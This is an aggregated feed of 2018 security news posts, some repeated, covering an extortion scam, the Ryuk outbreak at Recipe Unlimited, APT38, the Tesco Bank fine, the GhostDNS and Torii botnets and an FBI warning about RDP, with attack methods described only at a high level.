Experts from Cybaze have analyzed several samples of email belonging to this campaign, most of them in English. One of their customers received a scam message in a poor Italian-writing.

Crooks ask the victims to pay a fee of $3000 worth of Bitcoin, while the message written in Italian ask for $350, a circumstance that suggests that other threat actors are using the same technique.

The attackers may have implemented an automated mechanism to send scam emails to the addresses in the archive and create for each of them a Bitcoin wallet.

Experts from Cybaze have analyzed a couple of wallets associated with the scam messages, in one case they found a number of transactions that suggest victim made the payment.

The Bitcoin address with associated 9 transactions is 1Lughwk11SAsz54wZJ3bpGbNqGfVanMWzk

It is essential to share awareness about this campaign to avoid that other victims will fail victims of this type of extortion.

As usual, let me suggest to avoid use same credentials across multiple web services, you can check if your email is involved in a data breach by querying the free service

https://haveibeenpwned.com/

Pierluigi Paganini

(Security Affairs – Breach Compilation, scam campaign)

The post Experts warns of a new extortion campaign based on the Breach Compilation archive appeared first on Security Affairs.

Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?

The Canadian restaurant chain Recipe Unlimited that operates over 20 restaurant brands has suffered a major IT outage over the weekend in a “malware outbreak.”

The company operates nearly 1,400 restaurants under 19 different brands in Canada,

Recipe Unlimited has suffered a major malware-based attack that impacted several of its brands.

On Monday the company Monday confirmed that a malware is the root cause of a partial network outage at nine of its franchises, including Swiss Chalet, Harvey’s, East Side Mario’s, and Kelseys.

Recipe discovered the malware outbreak on September 28 and immediately started the incident response procedure. A number of systems have been taken offline, and all the locations infected by the ransomware were isolated from the Internet.

The affected locations continued to process card transactions manually,

The infections have caused the closure of a “small number” of restaurants for a “temporary period of time.”

“A limited number of Recipe Unlimited restaurants are currently experiencing a partial network outage. Only certain restaurants under the Swiss Chalet, Harvey’s, Milestones, KelseysMontana’s, Bier Markt, East Side Mario’s, The Landing Group of Restaurants and Prime Pubs brands have been impacted.” reads a statement published by the company.

“We learned of the malware outbreak on Friday, September 28 and immediately initiated steps to prevent any further spread and take appropriate precautionary measures. As a result, we have taken a number of our systems offline and suspended internet access to affected locations as a precaution. This caused some of our restaurants to experience some service delay related issues, including being unable to process credit and debit card transactions. However, all of those restaurants are able to manually process credit card charges. A smaller number of affected restaurants have decided to close for a temporary period of time to avoid inconvenience to guests due to service issues.”

According to the CBC News, the Recipe was the victim of a ransomware attack, the media also shared a copy of a ransom note that was provided by a worker at one of the affected restaurants.

“All of our computer systems crashed,” said a worker on shift at the time at an affected location. “The ransom note appeared under the file, ‘read me‘ in a WordPad format. We were all really in a state of shock.”

The hackers claim that they encrypted the files using “the strongest military algorithms,” at the time there is no info related to an amount of bitcoin requested to the victims.

The amount requested by the crooks will increase with the time.

“The final price depends on how fast you write to us,” warns the ransom note. “Every day of delay will cost you additional +0.5 BTC.”

Recipe Unlimited denies it was victim of a ransomware attac, because it conducts regular system backups to promptly mitigate such kind of attacks.

“We maintain appropriate system and data security measures,” said spokesperson Maureen Hart in an email.

Canadian restaurant chain Recipe

According to Hart, the ransom note published online is a “generic” statement associated with a virus called Ryuk, and other copies of the note can be found via a Google search.

The ransom note is associated with Ryuk ransomware, a threat discovered by security experts at Check Point in August. At the time, the ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor.

The campaign appears as targeted and well-planned, crooks targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.

Pierluigi Paganini

(Security Affairs – Recipe, ransomware)

The post Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack? appeared first on Security Affairs.

Hackers are holding Instagram accounts of influencers for ransom

By Waqas

The social media giant Facebook was hacked a few days ago after hackers exploited a vulnerability in its “View As” feature. As a result, 90 million users were affected but now, in another hacking spree hackers are targeting high-profile Instagram accounts and holding them for ransom – In some cases, hackers have gone one step further by […]

This is a post from HackRead.com Read the original post: Hackers are holding Instagram accounts of influencers for ransom

Plan for potential incidents and breach scenarios, cybersecurity conference hears

Businesses should prepare an incident plan for security breaches in advance to know what resources they’ll need to deal with it. Speaking at the Technology Ireland ICT Skillnet Cybercrime Conference earlier today, Brian Honan said that running different scenarios can help businesses identify whether they’ll need assistance from IT, legal, HR or public relations.

Research from the Institute of Directors in Ireland has found that 69 per cent of SMBs claim they’re prepared for a data breach. Brian flipped that statistic to point out that this means almost one third of business owners have no such plan.

Never mind cyber; it’s crime

He also encouraged companies to report incidents like ransomware, CEO fraud or a website infection. “Don’t forget you’re the victim of a crime. In most cases, a cybersecurity incident is treated as an IT problem, not even a business issue or a crime. It’s a mindset change. It’s not separate to your business, it’s integral to it.” To help make that change, he suggested: “we should drop the name ‘cyber’.”

When businesses have to disclose an incident, Brian called on them not to use the phrase ‘we suffered a sophisticated breach’ – because most times, it’s not true. In many cases, incidents are due human error, or to bad practices like poor passwords. “If you’re using cloud email, enable two-factor authentication and educate people in using secure passwords. Encourage them not to click on suspicious links,” he said.

Other attacks exploit platforms like WordPress and Joomla. Businesses using those tools to run their websites need to continuously manage and update them, Brian said. “Many web vulnerabilities and threats like attack types like SQL injection are known about for over 10 years,” he said.

Steps to better security

Companies can take several steps to improve their security, such as establishing policies. “They’re very important – they set the strategy for the business and help everybody to meet it,” said Brian. Having systems to monitor and respond to suspicious activity is also essential. “Look at the physical world: you can’t guarantee your business won’t be burgled. It’s the same in online world, but we need to be able to detect when it happens,” he said.

The best security investment a business can make is in awareness training for employees, Brian added. These programmes educate staff about how to identify potential attacks, and how to handle information in a secure way.

He also encouraged businesses to disclose when they have suffered an incident, to help improve overall security. “Everybody will have a breach, there’s no shame in that, so let’s get over that and share information to help each other,” he said.

Tackling the cybersecurity skills gap

Research shows a high proportion of security breaches take months to recover from, which is partly due to an industry skills shortage. “The biggest problem we have is a lack of skilled staff in cybersecurity,” Brian said. The conference saw the launch of a new programme to train 5,000 people in cybersecurity over the next three years. The Cybersecurity Skills Initiative aims to address the shortage in skilled security personnel.

It’s worth asking whether the industry is open to candidates without formal degrees in cybersecurity or computer science. Brian said some companies may need to relax restrictive HR policies such as requiring formal degrees in security or computer science to attract the right people into security roles. Otherwise, they could be missing out on enthusiastic, experienced and skilled people.

 

 

The post Plan for potential incidents and breach scenarios, cybersecurity conference hears appeared first on BH Consulting.

Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!

We hope you enjoy our Cyber Defense Magazine Annual Global Edition for 2018 including our Global Awards Winners for 2018…packed with over 75+ pages of excellent content.

Cyber Defense Magazine

Global Edition for 2018 has arrived.

Global Awards Winners Announced!

Sponsored By: TrendMicro

cyber defense emagazine global

 

InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to

subscribe – no strings, always free emagazines:

 

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards have arrived – Winners are listed here:  https://www.cyberdefensemagazine.com/cdga-winners-2018/

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!

MAGAZINES        TV        AWARDS  with our upcoming platform coming soon….

Sincerely,
TEAM CDM
Cyber Defense Magazine

 

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it! appeared first on Security Affairs.

Security Affairs: Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!

We hope you enjoy our Cyber Defense Magazine Annual Global Edition for 2018 including our Global Awards Winners for 2018…packed with over 75+ pages of excellent content.

Cyber Defense Magazine

Global Edition for 2018 has arrived.

Global Awards Winners Announced!

Sponsored By: TrendMicro

cyber defense emagazine global

 

InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to

subscribe – no strings, always free emagazines:

 

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards have arrived – Winners are listed here:  https://www.cyberdefensemagazine.com/cdga-winners-2018/

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!

MAGAZINES        TV        AWARDS  with our upcoming platform coming soon….

Sincerely,
TEAM CDM
Cyber Defense Magazine

 

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it! appeared first on Security Affairs.



Security Affairs

APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In just the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion dollars from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.).
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed recruitment and cooperation of individuals in-country to support with the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and necessary coordination amongst multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

FCA fines Tesco Bank £16.4m over 2016 cyber attack

Tesco Bank agreed to pay £16.4m as part of a settlement with the Financial Conduct Authority following the 2016 security breach.

The Financial Conduct Authority (FCA) has assigned a £16.4m fine to Tesco Bank for the vulnerabilities in its systems that were exploited by hackers to steal millions of pounds from customers’ online accounts in 2016.

In November 2016, Tesco Bank halted all online transactions after a cyber heist affected thousands of its customers. An investigation is ongoing.

The measure was announced by the chief executive Benny Higgins, at the time the bank admitted that 40,000 of 136,000 current banking customers had their accounts hacked, and 50 percent of them have lost money.

According to the financial institution, hackers stole £2.26m from 9,000 customers accounts for over 48 hours. Most of the transactions were made in Brazil and relied on magnetic strip rules.

tesco

The bank was fined because it was not able to demonstrate “due skill, care and diligence” in protecting customers’ accounts from cyber attacks.

“The fine the FCA imposed on Tesco Bank today reflects the fact that the FCA has no tolerance for banks that fail to protect customers from foreseeable risks.said Mark Steward, the executive director of enforcement and market oversight at the FCA.

“In this case, the attack was the subject of a very specific warning that Tesco Bank did not properly address until after the attack started. This was too little, too late. Customers should not have been exposed to the risk at all. Banks must ensure that their financial crime systems and the individuals who design and operate them work to substantially reduce the risk of such attacks occurring in the first place.”

“The standard is one of resilience, reducing the risk of a successful cyber-attack occurring in the first place, not only reacting to an attack.”

Tesco Bank was alerted by Visa one year before the cyber attack, but failed to apply the necessary countermeasures.

According to the FCA, Tesco Bank breached Principle 2 because it failed to exercise due skill, care and diligence to:

  • Design and distribute its debit card.
  • Configure specific authentication and fraud detection rules.
  • Take appropriate action to prevent the foreseeable risk of fraud.
  • Respond to the November 2016 cyber attack with sufficient rigour, skill and urgency. 

According to the FCA, hackers used an algorithm to generate valid debit card numbers that were involved in fraudulent transactions.

Tesco Bank provided all the necessary support to the FCA and fully compensated customers, it was also able to halt a significant percentage of unauthorized transactions.

The efforts of the bank in limiting the exposure of its customers in post-incident were praised by the FCA granted the bank 30% credit for mitigation. Tesco Bank also agreed to an early settlement which qualified it for a 30% (Stage 1) discount under the FCA’s executive settlement procedure

“Tesco Bank provided a high level of cooperation to the FCA. Through a combination of this level of cooperation, its comprehensive redress programme which fully compensated customers, and in acknowledgment that it stopped a significant percentage of unauthorised transactions, the FCA granted the bank 30% credit for mitigation.” continues the FCA.

“In addition, Tesco Bank agreed to an early settlement of this matter which qualified for a 30% (Stage 1) discount under the FCA’s executive settlement procedure. But for the mitigation credit and the Stage 1 discount, the FCA would have imposed a penalty of £33,562,400.”

Pierluigi Paganini

(Security Affairs – Tesco cyber heist,  cybercrime)

The post FCA fines Tesco Bank £16.4m over 2016 cyber attack appeared first on Security Affairs.

Security Affairs: GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers

Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers, the malicious code allows to modify DNS settings to hijack the traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS reminds us of the infamous DNSChanger malware that made the headlines for its ability to change DNS settings on the infected device

GhostDNS scans for the IP addresses used by routers that use weak or no password then accesses them and changes the DNS settings to a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS

The GhostDNS has a modular structure composed of four components:

1) DNSChanger Module: The main module designed to exploit targeted routers, it has three sub-modules dubbed, Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger.

1.) Shell DNSChanger is written in the Shell programming language and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
2.) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
3.) PyPhp DNSChanger is written in Python and PHP, it contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of which on Google Cloud, it includes functionalities like Web API, Scanner and Attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet to find vulnerable routers.

2) Web Admin module: Experts believe it implements an admin panel for attackers secured with a login page.

3) Rogue DNS module: The module resolves targeted domain names from the attacker-controlled web servers. At the time of the investigation, the expert had no access to the Rouge DNS server, for this reason, it was not possible to know the exact number DNS entries used to hijack legitimate domains.

4) Phishing Web module:  The module implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil where mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat GhostDNS malware poses to Internet sue to its scalability and the availability of multiple attack vector.

Further details, including IoCs are reported in the analysis published by Qihoo 360 NetLab.

Pierluigi Paganini

(Security Affairs – GhostDNS, IoT)

The post GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers appeared first on Security Affairs.



Security Affairs

GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers

Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers, the malicious code allows to modify DNS settings to hijack the traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS reminds us of the infamous DNSChanger malware that made the headlines for its ability to change DNS settings on the infected device

GhostDNS scans for the IP addresses used by routers that use weak or no password then accesses them and changes the DNS settings to a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS

The GhostDNS has a modular structure composed of four components:

1) DNSChanger Module: The main module designed to exploit targeted routers, it has three sub-modules dubbed, Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger.

1.) Shell DNSChanger is written in the Shell programming language and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
2.) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
3.) PyPhp DNSChanger is written in Python and PHP, it contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of which on Google Cloud, it includes functionalities like Web API, Scanner and Attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet to find vulnerable routers.

2) Web Admin module: Experts believe it implements an admin panel for attackers secured with a login page.

3) Rogue DNS module: The module resolves targeted domain names from the attacker-controlled web servers. At the time of the investigation, the expert had no access to the Rouge DNS server, for this reason, it was not possible to know the exact number DNS entries used to hijack legitimate domains.

4) Phishing Web module:  The module implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil where mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat GhostDNS malware poses to Internet sue to its scalability and the availability of multiple attack vector.

Further details, including IoCs are reported in the analysis published by Qihoo 360 NetLab.

Pierluigi Paganini

(Security Affairs – GhostDNS, IoT)

The post GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers appeared first on Security Affairs.

BH Consulting marks EU Cyber Security Month with daily tips on staying secure

October is EU Cyber Security Month and to mark the occasion, BH Consulting will be sharing advice about digital security and privacy. Every working day during October, we’ll post useful information on our Twitter feed and on our LinkedIn page.

These short tips will draw attention to common security risks and threats that many of us face. We’ll be using various hashtags as appropriate, including #CyberSecMonth, #Cybersecuritymonth2018 #cyberaware, #cyberhygiene and #saferinternet4EU. (We also recommend you visit the official website for the EU-wide awareness campaign, at www.cybersecuritymonth.eu.)

Staying secure at work and in the home

The themes we plan to cover include staying secure in the workplace by preventing CEO fraud, ransomware, phishing and spam. As the month goes on, we’ll also give advice you can pass on to family members about protecting personal information and using digital technology securely.

Many of our posts will link to blogs we have written or to other open source security awareness material. At the end of each week, we’ll round up those tips into a post which we’ll publish here on our blog. This will be a ‘living’ post about EU Cyber Security Month that we’ll keep adding to as each week passes during October.

Please like and share widely to help us spread the word and improve security awareness for everyone. And a quick reminder: we also publish a monthly newsletter for information security professionals and people working in related roles. You can sign up for the newsletter

The post BH Consulting marks EU Cyber Security Month with daily tips on staying secure appeared first on BH Consulting.

Security Affairs newsletter Round 182 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Hackers target Port of Barcelona, maritime operations had not affected
·      New Virobot malware combines ransomware and botnet capabilities
·      A bug in Twitter Account Activity API exposed users messages to wrong developers
·      Critical flaw affects Cisco Video Surveillance Manager
·      Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems
·      Firefox DoS issue crashes the browser and sometimes the Windows OS
·      Akamai Report: Credential stuffing attacks are a growing threat
·      Bitcoin Core Team fixes a critical DDoS flaw in wallet software
·      SHEIN Data breach affected 6.42 million users
·      White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day
·      Crooks leverages Kodi Media Player add-ons for malware distribution
·      Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak
·      Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled
·      oPatch community released micro patches for Microsoft JET Database Zero-Day
·      Mutagen Astronomy Linux Kernel vulnerability affects Red Hat, CentOS, and Debian distros
·      Pangu hackers are back, they realized the iOS 12 Jailbreak
·      Russian Sednit APT used the first UEFI rootkit of ever in attacks in the wild
·      Talos experts published technical details for other seven VPNFilter modules
·      Uber agrees to pay $148 million in massive 2016 data breach settlement
·      CVE-2018-1718 -Google Project Zero reports a new Linux Kernel flaw
·      CVE-2018-17182 -Google Project Zero reports a new Linux Kernel flaw
·      Facebook hacked – 50 Million Users Data exposed in the security breach
·      Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona
·      QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks
·      Facebook: User shadow data, including phone numbers may be used by advertisers
·      Torii botnet, probably the most sophisticated IoT botnet of ever
·      Trustwave expert found 2 credential leak issues in Windows PureVPN Client

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 182 – News of the week appeared first on Security Affairs.

FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP)

The FBI Internet Crime Complaint Center (IC3) warns of cyber attacks exploiting Remote Desktop Protocol (RDP) vulnerabilities.

Remote Desktop Protocol (RDP) is a widely adopted protocol for remote administration, but it could dramatically enlarge the attack surface if it isn’t properly managed.

The FBI Internet Crime Complaint Center (IC3) and the DHS issued a joint alert to highlight the rise of RDP as an attack vector.

Attackers are exploiting this feature to access systems to deploy malware such as the SamSam ransomware.

“Malicious cyber actors have developed methods of identifying and exploiting vulnerable RDP sessions over the Internet to compromise identities, steal login credentials, and ransom other sensitive information.” reads the alert issued by IC3.

“The Federal Bureau of Investigation (FBI) and Department of Homeland Security (DHS) recommend businesses and private citizens review and understand what remote accesses their networks allow and take steps to reduce the likelihood of compromise, which may include disabling RDP if it is not needed.”

Attackers can “infiltrate the connection” between the local and the remote machines and inject malware into the remote system. Experts warn that attacks using the Remote Desktop Protocol do not require user input, this makes intrusions difficult to detect.

The IC3 warns of the following vulnerabilities:

  • Weak passwords
  • Outdated versions of RDP may use flawed CredSSP that opens to man-in-the-middle attack.
  • Allowing unrestricted access to the default Remote Desktop Protocol port (TCP 3389).
  • Allowing unlimited login attempts to a user account.

RDP

The alert includes the audit of network for systems using RDP for remote communication, limiting the use of the Remote Desktop Protocol, keeping systems up to date, and implements multi-factor authentication wherever possible.

Pierluigi Paganini

(Security Affairs – IC3, hacking)

The post FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP) appeared first on Security Affairs.

Security Affairs: Torii botnet, probably the most sophisticated IoT botnet of ever

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017, it could targets a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the largest sets of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used for stealing data from compromised IoT devices. The bot exfiltrates several data from compromised devices, including hostname and process ID.

The malicious code has a modular structure that is capable of fetching and executing other commands and executables, it leverages multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet it that it implements more than six ways to achieve persistence on the infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

    1. Automatic execution via injected code into ~\.bashrc
    2. Automatic execution via “@reboot” clause in crontab
    3. Automatic execution as a “System Daemon” service via systemd
    4. Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
    5. Automatic execution via modification of the SELinux Policy Management
    6. Automatic execution via /etc/inittab

Torii infects devices with Telnet exposed and protected by weak credentials, it first executes a sophisticated script used to determines the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC with active polling in an endless loop, waiting for commands to execute. Once executed the command, the bot will reply with the results of its execution.

The samples analyzed by the expert were communicating with a command-and-control server that is located in Arizona.

At the time of the analysis, Telnet is the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli who noticed similarities to the Persirai.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but  by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs are reported in the analysis published by Avast.

Pierluigi Paganini

(Security Affairs – Torii IoT botnet, hacking)

The post Torii botnet, probably the most sophisticated IoT botnet of ever appeared first on Security Affairs.



Security Affairs

Torii botnet, probably the most sophisticated IoT botnet of ever

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017, it could targets a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the largest sets of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used for stealing data from compromised IoT devices. The bot exfiltrates several data from compromised devices, including hostname and process ID.

The malicious code has a modular structure that is capable of fetching and executing other commands and executables, it leverages multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet it that it implements more than six ways to achieve persistence on the infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

